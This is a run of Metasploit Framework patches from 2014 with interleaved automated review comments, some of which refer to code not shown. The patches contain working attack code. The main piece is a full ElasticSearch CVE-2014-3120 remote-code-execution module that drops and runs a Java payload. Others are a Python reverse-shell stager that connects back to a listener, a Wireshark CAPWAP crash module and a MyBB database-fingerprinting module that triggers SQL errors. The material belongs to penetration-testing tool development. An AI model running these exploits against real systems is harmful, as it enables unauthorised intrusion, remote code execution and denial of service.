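Review bot: The new expectation `str.should include("asdf&")` passes only because `'asdf' => nil` is followed by `'test' => ''` in the fixture hash; if the valueless parameter were serialised last, the assertion would fail although the query string is correct. `str.should include("test=")` is loose in the other direction, since it also passes when a value follows the `=`. Anchoring both, for example `str.should match(/(\A|[?&])asdf(&|\z)/)` and `str.should match(/(\A|[?&])test=(&|\z)/)`, would pin the nil and empty-string cases in the encoded and unencoded examples alike. The `it` blocks start outside these hunks.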
@@ -32,7 +32,7 @@ module Metasploit3
 cmd = ''
 # Set up the socket
 cmd += "import socket,struct\n"
- cmd += "s=socket.socket(2,1)\n" # socket.AF_INET = 2, socket.SOCK_STREAM = 1
+ cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
 cmd += "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
 cmd += "l=struct.unpack('>I',s.recv(4))[0]\n"
 cmd += "d=s.recv(4096)\n"
From 77e70d8bbeee1f8199009c12a50f79a342d50311 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Sun, 25 May 2014 16:28:40 -0400
Subject: [PATCH 381/853] Add 2 more variables for meterpreter irb
---
 lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index 6766ce7e7f..28138c8c25 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -314,6 +314,8 @@ class Console::CommandDispatcher::Core
 print_status("Starting IRB shell")
 print_status("The 'client' variable holds the meterpreter client\n")
+ session = client
+ framework = client.framework
 Rex::Ui::Text::IrbShell.new(binding).run
 end
From d3c17d8e3e9f27305d3df838603e57df451e0107 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sun, 25 May 2014 18:39:53 -0500
Subject: [PATCH 382/853] Delete wireshark_capwap_dos
---
 .../dos/wireshark/wireshark_capwap_dos.rb | 69 -------------------
 1 file changed, 69 deletions(-)
 delete mode 100644 modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb
diff --git a/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb b/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb
deleted file mode 100644
index 603f5e81ca..0000000000
--- a/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb
+++ /dev/null
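Review bot: The banner printed just above the two new locals in `core.rb` still announces only `client`, so a user who drops into IRB is never told that `session` and `framework` exist. Extend the message, for example `print_status("The 'client' and 'session' variables hold the meterpreter client, 'framework' holds the framework instance\n")`. Both locals are never read in the method and exist only to be captured by `binding`, so a short comment such as `# not used here: exposed to the IRB session through binding` would keep a later lint pass from deleting them. The method starts outside the hunk.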
@@ -1,69 +0,0 @@ -# -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - - Rank = GoodRanking - - include Msf::Exploit::Remote::Udp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireshark CAPWAP dissector crash', - 'Description' => %q{ - This module inject malicious packet udp to crash wireshark. The crash is when we send - a incomplete packet and trigger capwap dissector. - ) - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'j0sm1', # Exploit and msf module - 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" - ], - 'References' => - [ - [ 'CVE', '2013-4074'], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'DisableNops' => 'True', - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Wireshark CAPWAP dissector CRASH', - { - } - ], - ], - 'Privileged' => false, - 'DisclosureDate' => 'Apr 28 2014', - 'DefaultTarget' => 0)) - - # Protocol capwap needs port 5247 to trigger the dissector in wireshark - register_options([ Opt::RPORT(5247) ], self.class) - - end - - def exploit - - connect_udp - - # We send a packet incomplete to crash dissector - print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") - buf = "\x90" * 18 - udp_sock.put(buf) - - disconnect_udp - - end -end From 33ba1341474fed4cb31bbe0dc348c979dc3784d7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Sun, 25 May 2014 18:52:01 -0500 Subject: [PATCH 383/853] Clean msftidy warnings and metadata --- modules/auxiliary/dos/wireshark/capwap.rb | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index 6555ab5dcf..c777d21b92 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb 
+++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -12,27 +12,28 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Wireshark CAPWAP dissector DoS', + 'Name' => 'Wireshark CAPWAP Dissector DoS', 'Description' => %q{ - This module inject malicious packet udp to crash wireshark. The crash is when we send - a incomplete packet and trigger capwap dissector. + This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0 + to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an + incomplete packet. }, 'License' => MSF_LICENSE, 'Author' => [ - 'j0sm1', # Auxiliary msf module - 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" + 'Laurent Butti', # Discovery vulnerability + 'j0sm1' # Auxiliary msf module ], 'References' => [ - [ 'CVE', '2013-4074'], + ['CVE', '2013-4074'], + ['OSVDB', '94091'], + ['BID', '60500'] ], 'DisclosureDate' => 'Apr 28 2014')) - # Protocol capwap needs port 5247 to trigger the dissector in wireshark register_options([ Opt::RPORT(5247) ], self.class) - end def run @@ -41,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary # We send a packet incomplete to crash dissector print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...") - # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then + # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then # the dissector crash # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000 From eacf70af83e20098efd45178caf901875884b663 Mon Sep 17 00:00:00 2001 
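Review bot: `'DisclosureDate' => 'Apr 28 2014'` is left untouched although the hunk deletes the author comment `Reported: 2013-05-28 23:38 UTC`, the only other date in the metadata, and the reference is CVE-2013-4074. A 2014 disclosure date looks inconsistent with both and should be checked against the advisory before it is used for triage or reporting. The rewritten description also reads `This module inject a malicious udp packet`; `This module injects a malicious UDP packet` is the correct form. `initialize` begins outside the hunk.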
From: Karmanovskii <fnsnic@gmail.com> Date: Mon, 26 May 2014 23:26:28 +0400 Subject: [PATCH 384/853] Update mybb_get_type_db.rb 26.05.2014 23:26 I deleted mimicking IE11 --- modules/auxiliary/gather/mybb_get_type_db.rb | 18 ++++-------------- 1 file changed, 4 insertions(+), 14 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index b96e7a1a64..dd8a585a7a 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -35,18 +35,13 @@ class Metasploit3 < Msf::Auxiliary def check begin - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + uri = normalize_uri(target_uri.path, 'index.php') res = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'intcheck' => 1 } }) if res.nil? @@ -92,18 +87,13 @@ class Metasploit3 < Msf::Auxiliary def run - uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'letter' => -1 } }) if response.nil? From 0133e861f84e8cea3f34cfdf38464990ff8dd14c Mon Sep 17 00:00:00 2001 
From: William Vu <William_Vu@rapid7.com>
Date: Mon, 26 May 2014 23:55:20 -0500
Subject: [PATCH 385/853] Fix typo
---
 lib/rex/proto/http/client_request.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb
index 4336909510..e2d425c6c9 100644
--- a/lib/rex/proto/http/client_request.rb
+++ b/lib/rex/proto/http/client_request.rb
@@ -115,7 +115,7 @@ class ClientRequest
 qstr << '&' if qstr.length > 0
 qstr << (opts['encode_params'] ? set_encode_uri(var) : var)
- # support get paraemter without value
+ # support get parameter without value
 # Example: uri?parameter
 if val
 val = val.to_s
From ae1b7e564b1c30314add758ccea95e3abfd0079f Mon Sep 17 00:00:00 2001
From: Tom Sellers <tom@fadedcode.net>
Date: Tue, 27 May 2014 05:18:00 -0500
Subject: [PATCH 386/853] Update powershell.rb
---
 lib/msf/core/post/windows/powershell.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb
index d063846d88..867772db1b 100644
--- a/lib/msf/core/post/windows/powershell.rb
+++ b/lib/msf/core/post/windows/powershell.rb
@@ -19,7 +19,7 @@ module Powershell
 # Returns true if powershell is installed
 #
 def have_powershell?
- cmd_out = cmd_exec("echo. | powershell get-host")
+ cmd_out = cmd_exec("cmd.exe /c echo. | powershell get-host")
 return true if cmd_out =~ /Name.*Version.*InstanceId/m
 return false
 end
From 1d8c46155bc1b239cedd38953bdc99effbe92500 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 27 May 2014 10:14:55 -0500
Subject: [PATCH 387/853] Do last code cleaning
---
 modules/auxiliary/gather/mybb_get_type_db.rb | 56 +++++++++-----------
 1 file changed, 26 insertions(+), 30 deletions(-)
diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb
index dd8a585a7a..f127e03616 100644
--- a/modules/auxiliary/gather/mybb_get_type_db.rb
+++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -10,21 +10,17 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Determinant Databases MyBB ', + 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ - Determine the database in the forum. - This affects versions <= 1.6.12 + This module checks if MyBB is running behind an URL. Also uses a malformed query to + force an error and fingerprint the backend database used by MyBB. }, - 'Author' => + 'Author' => [ #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii <fnsnic[at]gmail.com>'#Discovery and Metasploit Module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] + 'Arthur Karmanovskii <fnsnic[at]gmail.com>' # Discovery and Metasploit Module ], + 'License' => MSF_LICENSE, 'DisclosureDate' => 'Feb 13 2014')) register_options( 
@@ -44,49 +40,49 @@ class Metasploit3 < Msf::Auxiliary 'intcheck' => 1 } }) - if res.nil? - print_error("Failed to retrieve webpage.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + if res.nil? || res.code != 200 return Exploit::CheckCode::Unknown end #Check PhP php_version = res['X-Powered-By'] if php_version - php_version = " PHP Version: #{php_version}".ljust(40) + php_version = "PHP #{php_version}" else - php_version = " PHP Version: unknown".ljust(40) + php_version = "PHP version unknown" end #Check Web-Server web_server = res['Server'] if web_server - web_server = " Server Version: #{web_server}".ljust(40) + web_server = "#{web_server}" else - web_server = " Server Version: unknown".ljust(40) + web_server = "unknown web server" end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) + print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}") return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") return Exploit::CheckCode::Unknown end + rescue + return Exploit::CheckCode::Unknown + end end def run + print_status("#{peer} - Checking MyBB...") + unless check == Exploit::CheckCode::Detected + print_error("#{peer} - MyBB not found") + return + end + + print_status("#{peer} - Checking database...") uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { 
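Review bot: The bare `rescue` that replaces `rescue RuntimeError => err` in `check` catches every StandardError, including a NoMethodError from a coding mistake, and returns `Exploit::CheckCode::Unknown` with no output. `run` then prints "MyBB not found" for what may be a network failure or a module bug. Rescue only the connection errors, for example `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e`, and log them with `vprint_error("#{peer} - #{e.class}: #{e}")` before returning. `web_server = "#{web_server}"` is also a no-op interpolation and can be removed. `check` begins outside this hunk.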
@@ -97,17 +93,17 @@ class Metasploit3 < Msf::Auxiliary } }) if response.nil? - print_error("Failed to retrieve webpage.") + print_error("#{peer} - Timeout...") return end #Resolve response if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("Database is: PostgreSQL ;)") + print_good("#{peer} - Running PostgreSQL Database") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("Database is: SQLite ;)") + print_good("#{peer} - Running SQLite Database") else - print_status("Database MySQL or this is not forum MyBB or unknown Database") + print_status("#{peer} - Running MySQL or unknown database") end end end From b96c2dd0ca38da3feb1bd3af3cf46b8414fe0876 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 27 May 2014 10:15:39 -0500 Subject: [PATCH 388/853] Change module filename --- .../gather/{mybb_get_type_db.rb => mybb_db_fingerprint.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/gather/{mybb_get_type_db.rb => mybb_db_fingerprint.rb} (100%) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb similarity index 100% rename from modules/auxiliary/gather/mybb_get_type_db.rb rename to modules/auxiliary/gather/mybb_db_fingerprint.rb From 86221de10eaa9f012266658199861a924a168265 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 27 May 2014 10:18:27 -0500 Subject: [PATCH 389/853] Fix message --- modules/auxiliary/gather/mybb_db_fingerprint.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index f127e03616..6dbdfeb160 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb 
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary
 #Check PhP
 php_version = res['X-Powered-By']
 if php_version
- php_version = "PHP #{php_version}"
+ php_version = "#{php_version}"
 else
 php_version = "PHP version unknown"
 end
From 1316365c2ff2179bfa63f38fe12ce7343ba40855 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 27 May 2014 10:22:39 -0500
Subject: [PATCH 390/853] Fix description
---
 modules/auxiliary/gather/mybb_db_fingerprint.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb
index 6dbdfeb160..be3a6b5acc 100644
--- a/modules/auxiliary/gather/mybb_db_fingerprint.rb
+++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb
@@ -13,7 +13,8 @@ class Metasploit3 < Msf::Auxiliary
 'Name' => 'Determinant Databases MyBB ',
 'Description' => %q{
 This module checks if MyBB is running behind an URL. Also uses a malformed query to
- force an error and fingerprint the backend database used by MyBB.
+ force an error and fingerprint the backend database used by MyBB on version 1.6.12
+ and prior.
 },
 'Author' =>
 [
From 69e82868387cf365021a0a51bd4e963710e7f1ce Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 27 May 2014 10:29:32 -0500
Subject: [PATCH 391/853] Fix title
---
 modules/auxiliary/gather/mybb_db_fingerprint.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb
index be3a6b5acc..a2beedb07c 100644
--- a/modules/auxiliary/gather/mybb_db_fingerprint.rb
+++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb
@@ -10,7 +10,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Determinant Databases MyBB ', + 'Name' => 'MyBB Database Fingerprint', 'Description' => %q{ This module checks if MyBB is running behind an URL. Also uses a malformed query to force an error and fingerprint the backend database used by MyBB on version 1.6.12 From cc1e81ecb75ba859e69c42eee2e3999686979e82 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Tue, 27 May 2014 10:29:55 -0500 Subject: [PATCH 392/853] Add sqlite3 to Gemfile Fixes all the post modules that require it to parse pilfered sqlite DB files. --- Gemfile | 6 ++++-- Gemfile.lock | 2 ++ 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/Gemfile b/Gemfile index 9045947d35..fdc185f439 100755 --- a/Gemfile +++ b/Gemfile @@ -10,12 +10,14 @@ gem 'json' gem 'msgpack' # Needed by anemone crawler gem 'nokogiri' +# Needed by db.rb and Msf::Exploit::Capture +gem 'packetfu', '1.1.9' # Needed by JSObfu gem 'rkelly-remix', '0.0.6' # Needed by anemone crawler gem 'robots' -# Needed by db.rb and Msf::Exploit::Capture -gem 'packetfu', '1.1.9' +# Needed for some post modules +gem 'sqlite3' group :db do # Needed for Msf::DbManager diff --git a/Gemfile.lock b/Gemfile.lock index 8c708c0467..5517e4fb79 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -53,6 +53,7 @@ GEM multi_json (~> 1.0.3) simplecov-html (~> 0.5.3) simplecov-html (0.5.3) + sqlite3 (1.3.9) timecop (0.6.3) tzinfo (0.3.37) yard (0.8.7) @@ -82,5 +83,6 @@ DEPENDENCIES rspec (>= 2.12) shoulda-matchers simplecov (= 0.5.4) + sqlite3 timecop yard From 3de8beb5fd3bf5d2613205fbe3b8e7f84ae9fc55 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 27 May 2014 11:22:40 -0500 Subject: [PATCH 393/853] Clean code --- .../scanner/elasticsearch/es_enum.rb | 64 ++++++++++++++----- 1 file changed, 47 insertions(+), 17 deletions(-) 
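Review bot: In the Gemfile hunk `gem 'sqlite3'` is added without a version constraint, while the neighbouring `packetfu` and `rkelly-remix` entries are pinned. The lockfile resolves it to 1.3.9, but a later `bundle update` would pull whatever release is newest without anyone reviewing it. A constraint such as `gem 'sqlite3', '~> 1.3.9'` keeps the dependency change visible in review. The gem also sits in the default group and, as far as I know, builds a native extension, so every install would need the SQLite development headers even when no post module is used; an optional group may be a better place for it.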
diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index 804cc8fcc9..12895c27bc 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb 
@@ -13,47 +13,77 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'ElasticSearch Enum Utility', - 'Description' => %q{ Send a request to enumerate ElasticSearch indices}, + 'Name' => 'ElasticSearch Indeces Enumeration Utility', + 'Description' => %q{ + This module enumerates ElasticSearch Indeces. It uses the REST API + in order to make it. + }, 'Author' => [ - 'Silas Cutler <Silas.Cutler [at] BlackListThisDomain.com>' + 'Silas Cutler <Silas.Cutler[at]BlackListThisDomain.com>' ], 'License' => MSF_LICENSE )) - + register_options( [ Opt::RPORT(9200) ], self.class) end + def peer + "#{rhost}:#{rport}" + end + def run_host(ip) + vprint_status("#{peer} - Querying indeces...") begin res = send_request_raw({ 'uri' => '/_aliases', 'method' => 'GET', }) - - begin - json_body = JSON.parse(res.body) - rescue JSON::ParserError - print_error("Unable to parse JSON") + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable + vprint_error("#{peer} - Unable to establish connection") return end - if res and res.code == 200 and res.body.length > 0 - json_body.each do |index| - print_good("Index : " + index[0]) + if res && res.code == 200 && res.body.length > 0 + begin + json_body = JSON.parse(res.body) + rescue JSON::ParserError + vprint_error("#{peer} - Unable to parse JSON") + return end - - path = store_loot("elasticsearch.enum.file", "text/plain", ip, res.body, "ElasticSearch Enum Results") - print_good("Results saved to #{path}") else - print_error("Failed to save the result") + vprint_error("#{peer} - Timeout or unexpected response...") + return end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable + report_service( + :host => rhost, + :port => rport, + :proto => 'tcp', + :name => 'elasticsearch' + ) + + indeces = [] + + json_body.each do |index| + indeces.push(index[0]) + report_note( + :host => rhost, + :port => rport, + :proto => 'tcp', + :type => "elasticsearch.index", + :data => index[0], + :update => :unique_data 
+ ) end + + if indeces.length > 0 + print_good("#{peer} - ElasticSearch Indeces found: #{indeces.join(", ")}") + end + end + end From 2271afc1a5e7b8373067ff8d097791c523983ab5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 27 May 2014 11:25:39 -0500 Subject: [PATCH 394/853] Change module filename --- .../scanner/elasticsearch/{es_enum.rb => indeces_enum.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/elasticsearch/{es_enum.rb => indeces_enum.rb} (100%) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb similarity index 100% rename from modules/auxiliary/scanner/elasticsearch/es_enum.rb rename to modules/auxiliary/scanner/elasticsearch/indeces_enum.rb From 7a29ae5f36c145e58fa750d8ae37206385c236d7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 27 May 2014 18:01:16 -0500 Subject: [PATCH 395/853] Add module for CVE-2014-3120 --- .../multi/elasticsearch/script_mvel_rce.rb | 213 ++++++++++++++++++ 1 file changed, 213 insertions(+) create mode 100644 modules/exploits/multi/elasticsearch/script_mvel_rce.rb diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb new file mode 100644 index 0000000000..9e5a2db466 --- /dev/null +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb 
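Review bot: `json_body.each do |index| ... index[0]` assumes the `/_aliases` response parses to a Hash, but only `JSON::ParserError` is handled, so a 200 reply carrying a JSON array from a host that is not ElasticSearch would be recorded as index names. Guard it with `return unless json_body.is_a?(Hash)` and iterate `json_body.keys`. `report_service` also runs before any index has been seen, so any endpoint that answers this path with valid JSON is stored as `elasticsearch`; moving it after the type check avoids polluting the database. Separately, "Indeces" should be "Indices" in the name, description and status messages, and the following commit carries the misspelling into the file name.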
@@ -0,0 +1,213 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in ElasticSearch, + exploitable by default on ElasticSearch prior to 1.2.0. The problem exists on + the REST API, accessible without authentication, neither authorization, where + the search function allows for dynamic scripts execution, which allows remote + attackers to execute arbitrary Java code. This module has been tested successfully + on ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3. + }, + 'Author' => + [ + 'Alex Brasetvik', # Vulnerability discovery + 'Bouke van der Bijl', # Vulnerability discovery and PoC + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-3120'], + ['OSVDB', '106949'], + ['EDB', '33370'], + ['URL', 'http://bouk.co/blog/elasticsearch-rce/'], + ['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch'] + ], + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'ElasticSearch 1.1.1 / Automatic', { } ] + ], + 'DisclosureDate' => 'Dec 09 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(9200), + OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', "/"]), + OptString.new("WritableDir", [ true, "A directory where we can write files (only for *nix environments)", "/tmp" ]) + ], self.class) + end + + def check + result = Exploit::CheckCode::Safe + + if vulnerable? 
+ result = Exploit::CheckCode::Vulnerable + end + + result + end + + def exploit + print_status("#{peer} - Trying to execute arbitrary Java..") + unless vulnerable? + fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") + end + + print_status("#{peer} - Asking remote OS...") + res = execute(java_os) + result = parse_result(res) + if result.nil? + fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...") + else + print_good("#{peer} - OS #{result} found") + end + + jar_file = "" + if result =~ /win/i + print_status("#{peer} - Asking TEMP path") + res = execute(java_tmp_dir) + result = parse_result(res) + if result.nil? + fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...") + else + print_good("#{peer} - TEMP path found on #{result}") + end + jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" + else + jar_file = File.join(datastore['WritableDir'], "#{rand_text_alpha(3 + rand(4))}.jar") + end + + register_file_for_cleanup(jar_file) + execute(java_payload(jar_file)) + end + + def vulnerable? + addend_one = rand_text_numeric(rand(3) + 1).to_i + addend_two = rand_text_numeric(rand(3) + 1).to_i + sum = addend_one + addend_two + + java = java_sum([addend_one, addend_two]) + res = execute(java) + result = parse_result(res) + + if result.nil? 
+ return false + else + result.to_i == sum + end + end + + def parse_result(res) + unless res && res.code == 200 && res.body + return nil + end + + begin + json = JSON.parse(res.body.to_s) + rescue JSON::ParserError + return nil + end + + begin + result = json['hits']['hits'][0]['fields']['msf_result'][0] + rescue + return nil + end + + result + end + + def java_sum(summands) + source = <<-EOF +#{summands.join(" + ")} + EOF + + source + end + + def to_java_byte_array(str) + buff = "byte[] buf = new byte[#{str.length}];\n" + i = 0 + str.unpack('C*').each do |c| + buff << "buf[#{i}] = #{c};\n" + i = i + 1 + end + + buff + end + + def java_os + "System.getProperty(\"os.name\")" + end + + def java_tmp_dir + "System.getProperty(\"java.io.tmpdir\");" + end + + + def java_payload(file_name) + source = <<-EOF +import java.io.*; +import java.lang.*; +import java.net.*; + +#{to_java_byte_array(payload.encoded_jar.pack)} +File f = new File('#{file_name.gsub(/\\/, "/")}'); +FileOutputStream fs = new FileOutputStream(f); +bs = new BufferedOutputStream(fs); +bs.write(buf); +bs.close(); +bs = null; +URL u = f.toURI().toURL(); +URLClassLoader cl = new URLClassLoader(new java.net.URL[]{u}); +Class c = cl.loadClass('metasploit.Payload'); +c.main(null); + EOF + + source + end + + def execute(java) + payload = { + "size" => 1, + "query" => { + "filtered" => { + "query" => { + "match_all" => {} + } + } + }, + "script_fields" => { + "msf_result" => { + "script" => java + } + } + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "_search"), + 'method' => 'POST', + 'data' => JSON.generate(payload) + }) + + return res + end + +end From 4b5c62ba8d14d38f1baa2f21b3ca73cbc5c80856 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Wed, 28 May 2014 12:19:17 -0500 Subject: [PATCH 396/853] Dress up CAPWAP DoS desc a little. --- modules/auxiliary/dos/wireshark/capwap.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) 
